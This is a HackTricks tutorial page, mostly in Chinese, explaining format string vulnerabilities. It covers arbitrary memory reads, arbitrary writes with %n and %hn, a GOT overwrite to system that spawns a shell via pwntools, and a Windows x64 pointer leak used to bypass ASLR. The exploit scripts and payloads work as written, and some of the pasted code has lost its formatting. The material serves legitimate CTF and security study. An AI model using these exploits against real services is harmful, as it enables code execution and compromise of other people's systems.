Format Strings

Tip

学习和实践 AWS 黑客技术：HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术：HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术：HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

查看 订阅计划!

加入 💬 Discord 群组 或 Telegram 群组 或在 Twitter 🐦 上关注我们 @hacktricks_live.

通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。

Notice that the attacker controls the printf parameter, which basically means that his input is going to be in the stack when printf is called, which means that he could write specific memory addresses in the stack.

Caution

控制该输入的攻击者将能够 在 stack 中添加任意 address 并使 printf 访问它们。下一节将说明如何利用这种行为。

Arbitrary Read

可以使用格式化符 %n$s 让 printf 获取位于第 n 个位置的 address，然后按照该地址读取并 将其作为字符串打印（打印直到遇到 0x00）。因此，如果二进制的基地址是 0x8048000，且我们知道用户输入在 stack 的第 4 个位置开始，就可以打印二进制起始处：

from pwn import *

p = process('./bin')

payload = b'%6$s' #4th param
payload += b'xxxx' #5th param (needed to fill 8bytes with the initial input)
payload += p32(0x8048000) #6th param

p.sendline(payload)
log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||'

Caution

注意：你不能将地址 0x8048000 放在输入的开头，因为该地址末尾会有 0x00 导致字符串被截断。

查找偏移

要找到输入的偏移量，你可以发送 4 或 8 字节（0x41414141）然后跟上 %1$x，并逐步增加值直到看到 A's。

暴力穷举 printf 偏移

```python # Code from https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak

from pwn import *

Iterate over a range of integers

for i in range(10):

Construct a payload that includes the current integer as offset

payload = f“AAAA%{i}$x“.encode()

Start a new process of the “chall” binary

p = process(“./chall”)

Send the payload to the process

p.sendline(payload)

Read and store the output of the process

output = p.clean()

Check if the string “41414141” (hexadecimal representation of “AAAA”) is in the output

if b“41414141“ in output:

If the string is found, log the success message and break out of the loop

log.success(f“User input is at offset : {i}“) break

Close the process

p.close()

</details>

### 有何用途

**Arbitrary reads** 可以用于：

- **Dump** the **binary** 从内存中
- **Access specific parts of memory where sensitive** **info** 被存储（例如 canaries、encryption keys 或 custom passwords，如这个 [**CTF challenge**](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak#read-arbitrary-value)）

## **Arbitrary Write**

格式化符 **`%<num>$n`** 会把已写入的字节数写入栈中第 <num> 个参数所指向的地址。如果攻击者能够通过 printf 写入任意数量的字符，就能够使 **`%<num>$n`** 在任意地址写入任意数值。

幸运的是，要写入数字 9999，并不需要在输入中添加 9999 个 "A"；可以使用格式化符 **`%.<num-write>%<num>$n`** 将数字 **`<num-write>`** 写入由 `<num>` 位置指向的地址。
```bash
AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param
AAAA.%500\$08x —> Param at offset 500

但是，注意通常在写入像 0x08049724（一次写入是个非常大的数）这样的地址时，会使用 $hn 而不是 $n。这允许只写入 2 Bytes。因此该操作需要进行两次，一次写入地址的高 2B，另一次写入低 2B。

因此，该漏洞允许在任意地址写入任意内容 (arbitrary write)。

在这个例子中，目标是要覆盖将在之后被调用的 GOT 表中某个函数的地址。当然这也可以滥用其他将 arbitrary write 转为执行的技术：

Write What Where 2 Exec

我们将覆盖一个从用户接收参数的函数，并将其指向 system 函数。
如上所述，写入地址通常需要两步：你先写入地址的 2Bytes，然后再写入另外的 2Bytes。为此使用 $hn。

HOB 指地址的高 2 字节
LOB 指地址的低 2 字节

然后，因为 format string 的工作方式，你需要先写入较小的 [HOB, LOB]，然后再写入另一个。

如果 HOB < LOB
[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]

如果 HOB > LOB
[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]

HOB LOB HOB_shellcode-8 NºParam_dir_HOB LOB_shell-HOB_shell NºParam_dir_LOB

python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'

Pwntools 模板

你可以在以下位置找到一个用于为此类漏洞准备 exploit 的 template：

Format Strings Template

或者来自 here 的这个基本示例：

from pwn import *

elf = context.binary = ELF('./got_overwrite-32')
libc = elf.libc
libc.address = 0xf7dc2000       # ASLR disabled

p = process()

payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)

p.clean()

p.sendline('/bin/sh')

p.interactive()

Format Strings to BOF

可以滥用 format string 漏洞的写入操作，向 stack 的地址写入，并利用 buffer overflow 类型的漏洞。

Windows x64: Format-string leak to bypass ASLR (no varargs)

在 Windows x64 上，前四个整数/指针参数通过寄存器传递：RCX、RDX、R8、R9。在许多有漏洞的调用点，攻击者控制的字符串被用作 format argument，但没有提供 variadic arguments，例如：

// keyData is fully controlled by the client
// _snprintf(dst, len, fmt, ...)
_snprintf(keyStringBuffer, 0xff2, (char*)keyData);

由于没有传入 varargs，任何像 “%p”, “%x”, “%s” 这样的转换都会导致 CRT 从相应的寄存器读取下一个可变参数。根据 Microsoft x64 calling convention，对 “%p” 的第一次读取来自 R9。call-site 上 R9 中的任何瞬态值都会被打印出来。实际上，这常常会 leak 一个模块内的稳定指针（例如，先前被周围代码放入 R9 的局部/全局对象的指针或一个 callee-saved 值），该指针可用于恢复 module base 并绕过 ASLR。

Practical workflow:

在攻击者可控字符串的最开始注入一个无害的格式，如 “%p “，以便第一次转换在任何过滤之前执行。
捕获被 leak 的指针，确定该对象在模块内的静态偏移（通过带符号或本地副本逆向一次），并通过 leak - known_offset 恢复 image base。
复用该 base 计算远程 ROP gadgets 和 IAT 条目的绝对地址。

Example (abbreviated python):

from pwn import remote

# Send an input that the vulnerable code will pass as the "format"
fmt = b"%p " + b"-AAAAA-BBB-CCCC-0252-"  # leading %p leaks R9
io = remote(HOST, 4141)
# ... drive protocol to reach the vulnerable snprintf ...
leaked = int(io.recvline().split()[2], 16)   # e.g. 0x7ff6693d0660
base   = leaked - 0x20660                     # module base = leak - offset
print(hex(leaked), hex(base))

Notes:

在本地逆向时只需确定要减去的精确偏移一次，然后在相同的二进制/版本下重用。
如果 “%p” 在第一次尝试时没有打印出有效的指针，尝试其他说明符 (“%llx”, “%s”) 或多个转换 (“%p %p %p”) 来采样其他参数寄存器/栈。
这种模式特定于 Windows x64 的 calling convention 和 printf-family 的实现：当格式字符串请求时，它们会从寄存器中获取不存在的 varargs。

该技术对于在使用 ASLR 且没有明显内存泄露原语的 Windows 服务上引导 ROP 非常有用。

其他示例与参考

https://ir0nstone.gitbook.io/notes/types/stack/format-string
https://www.youtube.com/watch?v=t1LH9D5cuK4
https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak
https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html
32 bit、no relro、no canary、nx、no pie，使用 format strings 基本方法从栈中 leak flag（无需改变执行流程）
https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html
32 bit、relro、no canary、nx、no pie，使用 format string 将 fflush 的地址覆盖为 win 函数（ret2win）
https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html
32 bit、relro、no canary、nx、no pie，使用 format string 在 .fini_array 中把一个地址写入 main（使流程再循环一次），并在 GOT 表中把指向 strlen 的地址写为 system。当流程返回 main 时，strlen 以用户输入运行并指向 system，将执行传入的命令。

参考资料